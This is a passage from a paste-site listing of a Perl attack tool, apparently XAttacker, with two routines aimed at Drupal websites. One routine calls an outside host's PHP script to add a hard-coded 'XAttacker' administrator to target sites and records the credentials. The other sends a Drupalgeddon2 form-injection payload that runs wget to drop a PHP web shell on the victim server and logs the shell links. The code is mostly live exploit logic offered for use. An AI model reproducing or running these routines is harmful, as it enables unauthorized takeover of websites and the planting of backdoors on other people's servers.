  2969. #drupal exploit coded by fallaeg gassrini xD thnx gass <3#
  2970. ##########################################################
  2971. sub drupal(){
  2972. $ua = LWP::UserAgent->new(keep_alive => 1);
  2973. $ua->agent("Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.3) Gecko/20010801");
  2974. $ua->timeout (20);
  2975.  
  2976. # check the link of the exploit or you can download script from here : http://pastebin.com/wPAbtyJ4 and you upload it on you one shell :)
  2977. $drupalink = "http://oriflame-angela.ru/gassrini.php";
  2978. my $exploit = "$drupalink?url=$site&submit=submit";
  2979. $admin ="XAttacker";
  2980. $pass ="XAttacker";
  2981. $dr = $site . '/user/login';
  2982. $red = $site . '/user/1';
  2983. my $checkk = $ua->get("$exploit")->content;
  2984. if($checkk =~/Success!/) {
  2985. print item(),"Drupal Add Admin";
  2986. print color('bold white')," ................... ";
  2987. print color('bold green'),"VULN\n";
  2988. print item(),"URL : $dr\n";
  2989. print color('bold white'),"USER : $admin\n";
  2990. print color('bold white'),"PASS : $pass\n";
  2991. open (TEXT, '>>Result/drupal.txt');
  2992. print TEXT "\nURL : $dr\n";
  2993. print TEXT "USER : $admin\n";
  2994. print TEXT "PASS : $pass\n\n";
  2995. close (TEXT);
  2996. }else{
  2997. print item(),"Drupal Add Admin";
  2998. print color('bold white')," .................. ";
  2999. print color('bold red'),"NOt VULN\n";
  3000. }
  3001. }
  3002.  
  3003. sub drupalgeddon{
  3004. my $url = "$site/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax";
  3005. $ajax = "_drupa_ajax";
  3006. $mail = "mail[#post_render][]";
  3007. $mailt= "mail[#type]";
  3008. $mailm = "mail[#markup]";
  3009. $wget = "wget https://raw.githubusercontent.com/Moham3dRiahi/XAttacker/master/XAttacker.php";
  3010. $response = $ua->post($url, Content_Type => 'multipart/form-data', Content => [form_id => 'user_register_form', $ajax => '1', $mail => 'exec', $mailt => 'markup', $mailm => $wget]);
  3011.  
  3012. if ($response =~ /200/){
  3013. print item(),"Drupalgeddon";
  3014. print color('bold white')," ...................... ";
  3015. print color('bold green'),"VULN\n\n";
  3016. print item(),"Shell Uploaded Successfully\n";
  3017. print color('bold white')," [Link] => $site/XAttacker.php?X=Attacker\n";
  3018. open (TEXT, '>>Result/shells.txt');
  3019. print TEXT "$up\n";
  3020. close (TEXT);
  3021. }else{
  3022. print item(),"Drupalgeddon";
  3023. print color('bold white')," ...................... ";
  3024. print color('bold red'),"NOt VULN\n\n";
  3025. }
  3026. }
  3027.  
  3028. sub item
  3029. {
  3030. my $n = shift // '+';
  3031. return color('bold red')," ["
  3032. , color('bold green'),"$n"
  3033. , color('bold red'),"] "
  3034. , color("bold white")
  3035. ;
  3036. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement